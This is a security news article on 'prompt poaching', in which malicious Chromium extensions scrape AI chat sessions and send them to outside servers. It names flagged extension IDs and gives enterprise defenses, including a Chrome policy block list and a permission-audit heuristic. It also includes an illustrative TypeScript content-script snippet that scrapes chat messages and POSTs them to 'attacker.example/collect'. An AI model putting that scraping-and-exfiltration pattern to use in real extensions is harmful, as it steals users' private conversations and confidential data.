New “prompt poaching” attack steals AI chats through malicious browser extensions
A new browser-based attack called “prompt poaching” lets malicious extensions copy users’ AI prompts and responses, then send that data to outside servers without clear consent. Security researchers say the threat targets people who use AI assistants inside Chrome or other Chromium-based browsers through sidebar tools and tab-aware extensions.
The risk matters because many people now use AI tools to summarize contracts, review code, draft emails, and analyze internal documents inside the browser. Microsoft says malicious AI assistant extensions have already reached about 900,000 installs and shown activity across more than 20,000 enterprise tenants, which turns a seemingly helpful add-on into a large-scale data collection channel.
Researchers at Expel say they handled several dozen incidents in the last month involving Chrome extensions that watched for AI tabs, captured questions and answers through API interception or DOM scraping, and then transmitted that material to external servers run by the extension operators.
How the attack works
The basic mechanism is simple. A malicious extension watches the pages a user opens, waits for a supported AI client to load, and then reads on-page content or intercepts data flows tied to the chat session. Expel says that behavior allows the extension to collect both the user’s input and the assistant’s reply.
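The capture step described above can be sketched in a few lines. Everything below is hypothetical for illustration: the selectors, the endpoint, and the payload shape are invented, since real extensions tailor them to each AI site's markup.

```typescript
// Sketch of the scraping flow a malicious content script could follow.
// The payload shape and endpoint are hypothetical, not from any real sample.
type ChatTurn = { role: "user" | "assistant"; text: string };

// Pure step: package captured turns the way an exfiltration endpoint
// might expect them (page URL plus the full conversation).
function buildExfilPayload(pageUrl: string, turns: ChatTurn[]) {
  return {
    url: pageUrl,
    capturedAt: new Date().toISOString(),
    turns,
  };
}

// In a real extension, a MutationObserver in the content script would
// watch the chat container and ship each update, roughly like:
//
//   new MutationObserver(() => {
//     const turns = [...document.querySelectorAll(".msg")].map(el => ({
//       role: el.classList.contains("user") ? "user" : "assistant",
//       text: el.textContent ?? "",
//     }));
//     fetch("https://attacker.example/collect", {
//       method: "POST",
//       body: JSON.stringify(buildExfilPayload(location.href, turns)),
//     });
//   }).observe(chatContainer, { childList: true, subtree: true });
```

The key point is that nothing here requires an exploit: reading the page and calling `fetch` are ordinary content-script capabilities once broad permissions are granted.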
That attack path fits how browser extensions work today. Google’s developer documentation says extensions can request permissions in the manifest, including host permissions and content script matches, while content scripts can read details from visited web pages through the Document Object Model and pass that data back to the parent extension.
In practice, that means an extension that asks for broad page access can become far more powerful than many users expect. Google’s Chrome Enterprise guidance also notes that administrators can control extension installs based on requested permissions, which highlights how central those permissions are to enterprise risk management.
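To make that permission surface concrete, here is a sketch of what a look-alike extension's manifest might request. The extension name and script file are invented; the fields themselves (`host_permissions`, `content_scripts`, `matches`) come from Chrome's Manifest V3 format.

```json
{
  "manifest_version": 3,
  "name": "AI Sidebar Helper",
  "version": "1.0.0",
  "permissions": ["tabs", "storage"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}
```

A manifest like this lets `content.js` run on, and read, every page the user visits, including AI chat sessions.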
Which extensions researchers flagged
Expel says some of the malicious tools were clones of popular AI-related extensions. The firm specifically listed “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” with extension ID fnmihdojmnkclgjpcoonokmkhjpjechg, “AI Sidebar with Deepseek, ChatGPT, Claude, and more” with ID inhcgfpbfdjbjogdfjbclgolkmhnooop, and “Talk to ChatGPT” with ID hoinfgbmegalflaolhknkdaajeafpilo.
Researchers also flagged a different pattern where a once-legitimate tool later gained prompt-poaching behavior after it built a large user base. Expel named Urban VPN Proxy, extension ID eppiocemhmnlbhjplcgkofciiegomcon, as an example of that approach.
Microsoft’s threat research adds wider context. It says the malicious extensions it investigated harvested full URLs and AI chat content from platforms such as ChatGPT and DeepSeek, exposing organizations to potential leaks of proprietary code, internal workflows, strategic discussions, and other confidential data.
Why prompt poaching is a serious enterprise problem
For companies, the danger goes beyond chat privacy. Employees often paste sensitive information into AI tools, including customer records, business plans, source code, tickets, and internal emails. Once a malicious extension captures that material, attackers can reuse it for phishing, fraud, reconnaissance, or resale.
The threat also scales fast because browser extensions sit inside daily workflows. Microsoft says many knowledge workers grant broad page-level permissions for convenience, and those permissions create a path for look-alike AI extensions to blend into normal browser use with very little friction.
Secure Annex, which coined the term “prompt poaching,” described it as a growing technique in which extensions capture and exfiltrate conversations users have with AI tools. That framing helps explain why the issue keeps appearing across multiple investigations rather than as a one-off malware campaign.
What security teams and users should do now
The safest response is to remove untrusted AI browser extensions, review extension permissions carefully, and switch to official desktop apps or first-party extensions where possible. Expel explicitly recommends restricting unapproved extensions and steering users toward tools developed directly by the AI vendor.
Organizations should also manage extensions centrally instead of leaving the choice to employees. Google says Chrome administrators can enforce policies for users or browsers and can control whether users may install extensions based on the permissions those extensions request.
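As a sketch of what that central control can look like, Chrome's documented `ExtensionSettings` policy accepts JSON like the following, here blocking all installs by default and force-removing the extension IDs researchers named. How the policy is deployed (GPO, MDM, or a managed-policy file) varies by platform.

```json
{
  "*": {
    "installation_mode": "blocked"
  },
  "fnmihdojmnkclgjpcoonokmkhjpjechg": { "installation_mode": "removed" },
  "inhcgfpbfdjbjogdfjbclgolkmhnooop": { "installation_mode": "removed" },
  "hoinfgbmegalflaolhknkdaajeafpilo": { "installation_mode": "removed" }
}
```

Approved extensions can then be allowlisted individually with `"installation_mode": "allowed"` entries.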
Google’s Chrome Web Store policies state that the store aims to provide a safe and secure environment built on trust and transparency, and requires developers to follow its program policies. Even so, current research shows that malicious or deceptive extensions still make it through review, which means businesses cannot rely on store vetting alone.
Prompt poaching at a glance
| Area | What researchers found |
|---|---|
| Attack name | “Prompt poaching” |
| Main technique | DOM scraping or API interception of AI chats |
| Primary targets | Users of AI browser extensions on Chromium-based browsers |
| Data at risk | Prompts, responses, URLs, browsing telemetry |
| Scale cited by Microsoft | About 900,000 installs, activity in 20,000+ enterprise tenants |
| Main defenses | Remove suspicious extensions, restrict installs, prefer official tools |
Signs an extension may be risky
- It asks for broad access to many sites without a clear reason
- It claims support for several AI brands in one tool while hiding the vendor identity
- It appeared as a clone of a popular extension with slightly altered branding
- It changed behavior after an update
- It collects browsing data, tab activity, or page content by default
- It routes data to external servers unrelated to the stated feature set
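The first and fifth warning signs above can be checked mechanically. The sketch below reads a manifest object and flags broad host access; the field names follow Chrome's manifest format, while the specific patterns treated as "broad" are our assumption.

```typescript
// Heuristic audit for broad page access in an extension manifest.
// Field names match Chrome's manifest schema; the risk threshold
// (which match patterns count as "broad") is an assumption.
type Manifest = {
  permissions?: string[];
  host_permissions?: string[];
  content_scripts?: { matches?: string[] }[];
};

const BROAD_PATTERNS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

function hasBroadPageAccess(m: Manifest): boolean {
  const hosts = [
    ...(m.host_permissions ?? []),
    ...(m.permissions ?? []), // older MV2 manifests mixed host patterns into permissions
    ...(m.content_scripts ?? []).flatMap((cs) => cs.matches ?? []),
  ];
  return hosts.some((h) => BROAD_PATTERNS.includes(h));
}
```

A security team could run a check like this over the `manifest.json` files in managed browser profiles to surface extensions that deserve a closer look.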
FAQ
What is prompt poaching?
Prompt poaching is the theft of AI chat content by a browser extension that watches for AI sessions, copies prompts and responses, and sends them to outside servers.
Which browsers are affected?
The current reporting centers on Chromium-based browsers, which includes Chrome and other browsers built on the same extension model, such as Microsoft Edge.
What data can attackers steal?
Researchers say attackers can capture prompts, replies, full URLs, and browsing telemetry. That can expose source code, internal workflows, strategic discussions, and other confidential data.
How should organizations respond?
Ban unsanctioned extensions, audit installed add-ons, review requested permissions, and move workers to official AI clients or trusted first-party extensions.